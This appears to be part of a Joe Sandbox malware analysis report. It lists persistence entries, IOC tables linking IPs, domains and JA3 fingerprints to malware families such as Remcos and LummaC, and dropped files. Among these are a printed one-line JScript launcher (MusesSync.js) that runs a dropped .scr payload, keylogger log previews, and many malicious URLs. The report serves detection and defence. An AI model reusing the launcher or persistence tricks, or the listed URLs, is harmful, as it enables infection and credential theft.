                                                                      15:57:31Task SchedulerRun new task: ywezrgl path: C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                                                                      15:57:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run QuickTextPaste C:\Users\user\Pictures\QuickTextPaste\Bin\QuickTextPaste.exe
                                                                      15:57:42Task SchedulerRun new task: Electronics path: wscript s>//B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js"
                                                                      15:57:46AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      74.220.219.13BN888906SL.exeGet hashmaliciousFormBookBrowse
                                                                      • www.alisamatlovsky.com/g09e/?yr=PLtiZaueJctoF68UnBiRsrwDoNSpksul+oVaoHz1S7a2A6MWtffLxKxMMrR491q5K9Re&Tf=Wjitv4FPaPXXq4
                                                                      re#U00e7u de paiement.exeGet hashmaliciousFormBookBrowse
                                                                      • www.cartwheeldesigns.com/poub/?7nlPA=3futZD&AP6d=fPctErIL08O+9jMUnfL/MHELk77poc5EaziR3XKsx3WzDrQTjfqvRit/3JIzHXG20QWt
                                                                      #U00da#U010dtenka.exeGet hashmaliciousFormBookBrowse
                                                                      • www.cartwheeldesigns.com/poub/?x0DL1L6H=fPctErIL08O+9jMUnfL/MHELk77poc5EaziR3XKsx3WzDrQTjfqvRit/3JIzHXG20QWt&3fPL=8pdHmNmpx
                                                                      178.237.33.50YYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                      • geoplugin.net/json.gp
                                                                      FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      • geoplugin.net/json.gp
                                                                      ungziped_file.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • geoplugin.net/json.gp
                                                                      download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                      • geoplugin.net/json.gp
                                                                      file.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      EIesXTUPI9.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      69.49.234.173https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                        Product_Samples.docGet hashmaliciousDarkTortilla, XWormBrowse
                                                                          http://links.shippingeasyemail.com/ls/click?upn=u001.PaMMbX-2BZJDQGzQUDvtlBihc3qsVxLYIuSwDQ1r-2BfOBtu3bIyumNIGb-2Bk1jevQM0tQRVGrRRjDImxhRcDr8wjq0OoINiqw-2FyJqccby7I18b4FqBZwgiu5FOtiFKFFcdJaxlMV4DHZM-2BX250H0s9QzMzlwkbmilaqBN5-2FOTtbdaH1ztphxKyPEdsZvDodwGB-2FlS5H0b82YPjcFrRlHdhwRQPC6Oltz1CUwSWqfXUHZ90S9Qmctd-2FPAY5clcx9zgMxfZqqyUepOxvko-2F0IMCE34IbpFhh3GTAAUiHZR91PlT6GxCqY4sycDzgtH-2FszCrM0roEKRU9fUEACTKh5pCVbstOlWKD42np9IhPPWjMCOSFfoTDsLqIqsXhBLX8hNSSYHgnINwg6um9KyrHo-2B-2F7jKeR0t4xTzVpMu9C6EMvNK7663z37mo9cZqp0pWIRsERpbzkpbwlO92xoHYgaw5mU5vNY4HTvq9xyOlxShFJ8Jt0qMHK4L1hS7NrWNaEoJ06B14jsLF1ysEbeCvrJ0fk-2FhZJBnbd-2Fo75B6fZVHwYnJuG-2B1EwtTxm1PpBl2AdDaQWnOy-2FdZ9K1SC6HPOo4VjrsNDus7OfgmOj-2F9Vn7j3IrmyHd-2Bl40IlsS2zGX-2BAKrImBgZ8HiQva5YAmOrvQSeIyjlyuas-2FFog-2BRiw-2FVetNT7WJ7Y-3DzCvT_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKmDQIDaqcnwcZzHNHs20PB8JmX-2F-2Bw4ENfJO7CG5b4PZ4Of1py3hTb1bZ1yP2MPWK7y7H0SyyBgw-2Bg6GnNkKJccwiuQ9YG13orvFZBRcTvZkzfk1E5vn-2F-2F32HYrDcSVA22WTu-2BOM9RNTJGwMLwlY4piKa9NmrY9wTWxqbqPEkP3wExLtEytF-2FnI6wUZEfOWbSJ7YUDj-2Bmbma6d3J7lqbC2j8vXLU2b-2FhMGtPgebUYOfuFRZzVQx3y57a0xe8ReF3spZeAtXb8Zal3vmmK-2FENKuZpKYwOiP1GZtjUM9DY0U0P-2Fp3sLtLkUX0-2FvtFMPlVtvsnBHqHHqw-2BUSYrxDi4Q2TaaZD7vLlOwN04lectNma0AQlVTkkIQFCctjn6N3wZoZ7YRpZ0W4jdJfY1BqnR81jxA-3D-3DGet hashmaliciousUnknownBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            fp2e7a.wpc.phicdn.nethttps://www.amtso.org/check-desktop-phishing-page/Get hashmaliciousUnknownBrowse
                                                                            • 192.229.221.95
                                                                            FACTURA 4377.exeGet hashmaliciousUnknownBrowse
                                                                            • 192.229.221.95
                                                                            WEqMZ4qrbX.dllGet hashmaliciousUnknownBrowse
                                                                            • 192.229.221.95
                                                                            exe005(1).exeGet hashmaliciousBerbewBrowse
                                                                            • 192.229.221.95
                                                                            exe002(1).exeGet hashmaliciousBerbewBrowse
                                                                            • 192.229.221.95
                                                                            exe001.exeGet hashmaliciousBerbewBrowse
                                                                            • 192.229.221.95
                                                                            yuc1Jwlkh5.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 192.229.221.95
                                                                            W2441700053.exeGet hashmaliciousBlackMoonBrowse
                                                                            • 192.229.221.95
                                                                            nowe zam#U00f3wienie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 192.229.221.95
                                                                            Quote 40240333-REV2.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 192.229.221.95
                                                                            geoplugin.netYYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                            • 178.237.33.50
                                                                            FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                            • 178.237.33.50
                                                                            ungziped_file.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 178.237.33.50
                                                                            rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                            • 178.237.33.50
                                                                            file.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            EIesXTUPI9.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            bg.microsoft.map.fastly.netfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                            • 199.232.210.172
                                                                            beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
                                                                            • 199.232.210.172
                                                                            DellTpm1.2_Fw5.81.2.1_V3_64.exeGet hashmaliciousUnknownBrowse
                                                                            • 199.232.214.172
                                                                            Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                            • 199.232.210.172
                                                                            phish_alert_sp2_2.0.0.0 (7).emlGet hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            New.Order Request-#54576.scrGet hashmaliciousUnknownBrowse
                                                                            • 199.232.214.172
                                                                            nested-postacert.emlGet hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            nowe zam#U00f3wienie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 199.232.210.172
                                                                            PHA AL PO.vbsGet hashmaliciousUnknownBrowse
                                                                            • 199.232.214.172
                                                                            RFQ-378093.vbsGet hashmaliciousUnknownBrowse
                                                                            • 199.232.210.172
                                                                            s-part-0015.t-0009.t-msedge.netzhbEGHo55P.exeGet hashmaliciousLockBit ransomwareBrowse
                                                                            • 13.107.246.43
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 13.107.246.43
                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 13.107.246.43
                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 13.107.246.43
                                                                            VNC Sales.xlsxGet hashmaliciousUnknownBrowse
                                                                            • 13.107.246.43
                                                                            https://midlandtxconstruction.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5VVmliM0U9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 13.107.246.43
                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 13.107.246.43
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 13.107.246.43
                                                                            https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/graylinelaketahoe.com&c=E,1,BWhR2At2OZAdw2Kzdn7d-U-fLZRdgzpdTFbcA87JOQxek-SzsLBqKBG-KMVpA5JovWFRbO4mN3q2zPe1YDaTOG57b4G9v05-IgsJXqrG4om_58_65Os9ldlZ&typo=1Get hashmaliciousUnknownBrowse
                                                                            • 13.107.246.43
                                                                            http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUM1RXUzBHU1RDUjlQOFBPUUE4QVRaS0pPSC4uGet hashmaliciousHTMLPhisherBrowse
                                                                            • 13.107.246.43

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            UNIFIEDLAYER-AS-1USexe009.exeGet hashmaliciousEmotetBrowse
                                                                            • 198.20.228.9
                                                                            https://t.ly/ShNFUGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 50.87.233.27
                                                                            https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 192.254.232.133
                                                                            FACTER9098767800.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.241.62.63
                                                                            https://viewstripo.email/680864d7-5609-4e6a-8914-c4d257d4c5ee1731949744848Get hashmaliciousUnknownBrowse
                                                                            • 108.167.141.193
                                                                            owari.arm.elfGet hashmaliciousUnknownBrowse
                                                                            • 142.6.100.237
                                                                            https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 192.232.223.48
                                                                            Play_vm_Message_for_Melissa.medina_wav_ .htmGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 162.241.225.189
                                                                            Portfolio Review _2024.htmlGet hashmaliciousUnknownBrowse
                                                                            • 69.49.245.172
                                                                            https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//colignymart.com/kiloa/memei/QepXS7lFNwbUolrMPBrA5Cn1RJP/a3Jpa29yLnllbWVuamlhbkBzcnMuZ292&..=c&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogoGet hashmaliciousUnknownBrowse
                                                                            • 162.241.61.204
                                                                            EPMTelecomunicacionesSAESPCOxd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                            • 181.135.128.155
                                                                            yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                                                            • 201.233.225.46
                                                                            nK1cgEhvAP.exeGet hashmaliciousUnknownBrowse
                                                                            • 181.143.240.113
                                                                            mKh1JOZ2HL.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                            • 190.240.48.29
                                                                            qZ8lFI9zNz.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                            • 190.240.48.29
                                                                            amen.arm.elfGet hashmaliciousUnknownBrowse
                                                                            • 181.129.117.149
                                                                            mNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                                                            • 181.129.96.162
                                                                            75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                                            • 181.129.96.162
                                                                            sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                            • 190.70.10.219
                                                                            botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 190.28.120.103
                                                                            ATOM86-ASATOM86NLYYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                            • 178.237.33.50
                                                                            FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                            • 178.237.33.50
                                                                            ungziped_file.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                            • 178.237.33.50
                                                                            rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                            • 178.237.33.50
                                                                            file.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            EIesXTUPI9.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            UNIFIEDLAYER-AS-1USexe009.exeGet hashmaliciousEmotetBrowse
                                                                            • 198.20.228.9
                                                                            https://t.ly/ShNFUGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 50.87.233.27
                                                                            https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 192.254.232.133
                                                                            FACTER9098767800.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.241.62.63
                                                                            https://viewstripo.email/680864d7-5609-4e6a-8914-c4d257d4c5ee1731949744848Get hashmaliciousUnknownBrowse
                                                                            • 108.167.141.193
                                                                            owari.arm.elfGet hashmaliciousUnknownBrowse
                                                                            • 142.6.100.237
                                                                            https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 192.232.223.48
                                                                            Play_vm_Message_for_Melissa.medina_wav_ .htmGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 162.241.225.189
                                                                            Portfolio Review _2024.htmlGet hashmaliciousUnknownBrowse
                                                                            • 69.49.245.172
                                                                            https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//colignymart.com/kiloa/memei/QepXS7lFNwbUolrMPBrA5Cn1RJP/a3Jpa29yLnllbWVuamlhbkBzcnMuZ292&..=c&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogoGet hashmaliciousUnknownBrowse
                                                                            • 162.241.61.204

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            1138de370e523e824bbca92d049a3777file.exeGet hashmaliciousAmadey, Cryptbot, Stealc, VidarBrowse
                                                                            • 23.1.237.91
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 23.1.237.91
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 23.1.237.91
                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 23.1.237.91
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 23.1.237.91
                                                                            http://eliztalks.com/js.php?device=windows&ip=MTk5LjE2OC41OC4xMTM=&refferer=aHR0cHM6Ly93d3cuc3JhbWFuYW1pdHJhLmNvbS8yMDI0LzExLzE2L3NjYWxpbmctdG8tNTAwbS1pbi1yZXZlbnVlLW1vZG1lZC1jZW8tZGFuaWVsLWNhbmUtcGFydC0yLw==&browser=Q2hyb21l&ua=bW96aWxsYS81LjAgKHdpbmRvd3MgbnQgMTAuMDsgd2luNjQ7IHg2NCkgYXBwbGV3ZWJraXQvNTM3LjM2IChraHRtbCwgbGlrZSBnZWNrbykgY2hyb21lLzEzMS4wLjAuMCBzYWZhcmkvNTM3LjM2&domain=aHR0cHM6Ly9lbGl6dGFsa3MuY29t&loc=VVM=&is_ajax=1Get hashmaliciousUnknownBrowse
                                                                            • 23.1.237.91
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 23.1.237.91
                                                                            http://eliztalks.com/wp-config.jsGet hashmaliciousUnknownBrowse
                                                                            • 23.1.237.91
                                                                            87654785457596574686FKHN-Copy.pdfGet hashmaliciousPhisherBrowse
                                                                            • 23.1.237.91
                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 23.1.237.91
                                                                            28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousAmadey, Cryptbot, Stealc, VidarBrowse
                                                                            • 13.107.246.43
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 13.107.246.43
                                                                            Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                            • 13.107.246.43
                                                                            EIR5pTRn9R.exeGet hashmaliciousDragonForceBrowse
                                                                            • 13.107.246.43
                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 13.107.246.43
                                                                            WordPicture.exeGet hashmaliciousUnknownBrowse
                                                                            • 13.107.246.43
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 13.107.246.43
                                                                            B0D2CC785Z.htmGet hashmaliciousUnknownBrowse
                                                                            • 13.107.246.43
                                                                            https://gamesnewhere.s3.us-west-2.amazonaws.com/rere.htmlGet hashmaliciousPhisherBrowse
                                                                            • 13.107.246.43
                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 13.107.246.43
                                                                            3b5074b1b5d032e5620f69f9f700ff0eDOCS.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 69.49.234.173
                                                                            • 74.220.219.13
                                                                            BOMB-762.msiGet hashmaliciousAteraAgentBrowse
                                                                            • 69.49.234.173
                                                                            • 74.220.219.13
                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 69.49.234.173
                                                                            • 74.220.219.13
                                                                            Ksciarillo_Reord_Adjustment.docxGet hashmaliciousUnknownBrowse
                                                                            • 69.49.234.173
                                                                            • 74.220.219.13
                                                                            Play_vm_Message_for_Melissa.medina_wav_ .htmGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 69.49.234.173
                                                                            • 74.220.219.13
                                                                            ________.exeGet hashmaliciousQuasarBrowse
                                                                            • 69.49.234.173
                                                                            • 74.220.219.13
                                                                            file.exeGet hashmaliciousCryptbotBrowse
                                                                            • 69.49.234.173
                                                                            • 74.220.219.13
                                                                            INQUIRY_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 69.49.234.173
                                                                            • 74.220.219.13
                                                                            bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                            • 69.49.234.173
                                                                            • 74.220.219.13
                                                                            P.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 69.49.234.173
                                                                            • 74.220.219.13

                                                                            Dropped Files

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrpennicle.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                                              SolPen.exeGet hashmaliciousLummaC StealerBrowse
                                                                                SolPen.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      https://sos-at-vie-1.exo.io/bucketrack/dir62/final/asgrd/bot-check-v1.htmlGet hashmaliciousUnknownBrowse
                                                                                        grd.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                          AssumedAlready.exeGet hashmaliciousLummaCBrowse
                                                                                            yhYrGCKq9s.exeGet hashmaliciousRedLineBrowse
                                                                                              nj230708full.pdf.scr.exeGet hashmaliciousAsyncRAT, AveMaria, StormKitty, VenomRATBrowse

                                                                                                Created / dropped Files

                                                                                                C:\ProgramData\datos\registros.dat

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\88473\Defensive.pif
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):184
                                                                                                Entropy (8bit):3.4036814377462723
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:rhlKlfalfVlcAtTfwl55JWRal2Jl+7R0DAlBG4phlKlfalfVlcAtSNPQblovDl6v:6lfalHcBl55YcIeeDAlMlfalHcPNIbW+
                                                                                                MD5:ECFC08AF327AE9597FA6C4B160A9A0DD
                                                                                                SHA1:397CC9D17E210CD022F11ED2857A1C09D61411B4
                                                                                                SHA-256:E45EC81EC3FBE8A0FF478B5A7DF583228C4B9A7225C04C4AD5BD384FFEFB47BE
                                                                                                SHA-512:D86B2AE87C882F5663DFA3FDE24E61A0679664D76522071BA63F101CCB1459E8BE5F7606F553FB99ECA377F07E09CFF8FB05C30619C09B254E15CEB1D640B818
                                                                                                Malicious:false
                                                                                                Preview:....[.2.0.2.4./.1.1./.1.9. .0.9.:.5.8.:.2.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.1./.1.9. .0.9.:.5.8.:.2.7. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                C:\ProgramData\registro\registros.dat

                                                                                                Download File
                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):640
                                                                                                Entropy (8bit):3.383101740864016
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:6l2cPxecml2cPfbWFe5Ul2cPSl2cPUfIbWFe5Ul2cPql2cPLbWFe5Ul2cPTl2cPs:6pkcmpTWqUpSpNWqUpqpHWqUpTp4vW+
                                                                                                MD5:CD5CABC868467C1D14EF467FF2185CFB
                                                                                                SHA1:11CD34BF7AFA3E70018E7FC5B03A0EC65FC2996B
                                                                                                SHA-256:16789CEF8A514EA2563544C3253CC909FBE5B3914DB6843597B1349F061020BB
                                                                                                SHA-512:F0FCB82BFE7A497A4BD36CB26615DA9D085CDC947E2ACCDD8A464D17D4315B85A26698BCE7465548046253761747297A8A4B151DBB9DD4D3C0C749555C8F85D2
                                                                                                Malicious:false
                                                                                                Preview:....[.2.0.2.4./.1.1./.1.9. .0.9.:.5.7.:.2.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.1./.1.9. .0.9.:.5.7.:.2.5. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.1./.1.9. .0.9.:.5.7.:.3.0. .R.u.n.].........[.2.0.2.4./.1.1./.1.9. .0.9.:.5.7.:.3.2. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.1./.1.9. .0.9.:.5.7.:.3.8. .R.u.n.].........[.2.0.2.4./.1.1./.1.9. .0.9.:.5.7.:.3.8. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.1./.1.9. .0.9.:.5.7.:.4.6. .R.u.n.].........[.2.0.2.4./.1.1./.1.9. .0.9.:.5.7.:.5.1. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\88473\Defensive.pif
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):174
                                                                                                Entropy (8bit):4.653586615618931
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:RiMIpGXIdPHo55wWAX+aJp6/h4EkD5hERfcLSQAayTFZo5uWAX+aJp6/h4EkD5hL:RiJBJHonwWDaJ0/hJkD/4f6SQAjTFywV
                                                                                                MD5:A9A795B065FE0D5DAF28108CB99E097E
                                                                                                SHA1:B5AA6A7699ADEE27676AFC39CF2425B788A99D62
                                                                                                SHA-256:C8A91453B689A8828221D15FCE86602EF2250FFC856B9B6556CD697FC45A319E
                                                                                                SHA-512:07DC8247BCC4B17B57FA4232FE6363429CBA1027A6C7BAA7A6845E13B5CE8285E121F74FEB84078CD7D66DA3E163253D7EC701E28FF2C6D761832F2F06C07D2C
                                                                                                Malicious:true
                                                                                                Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\DataSync Dynamics\\MusesSync.scr\" \"C:\\Users\\user\\AppData\\Local\\DataSync Dynamics\\P\"")

                                                                                                C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\Temp\88473\Defensive.pif
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):943784
                                                                                                Entropy (8bit):6.625461630496363
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
                                                                                                MD5:78BA0653A340BAC5FF152B21A83626CC
                                                                                                SHA1:B12DA9CB5D024555405040E65AD89D16AE749502
                                                                                                SHA-256:05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
                                                                                                SHA-512:EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: pennicle.txt.ps1, Detection: malicious, Browse
                                                                                                • Filename: SolPen.exe, Detection: malicious, Browse
                                                                                                • Filename: SolPen.exe, Detection: malicious, Browse
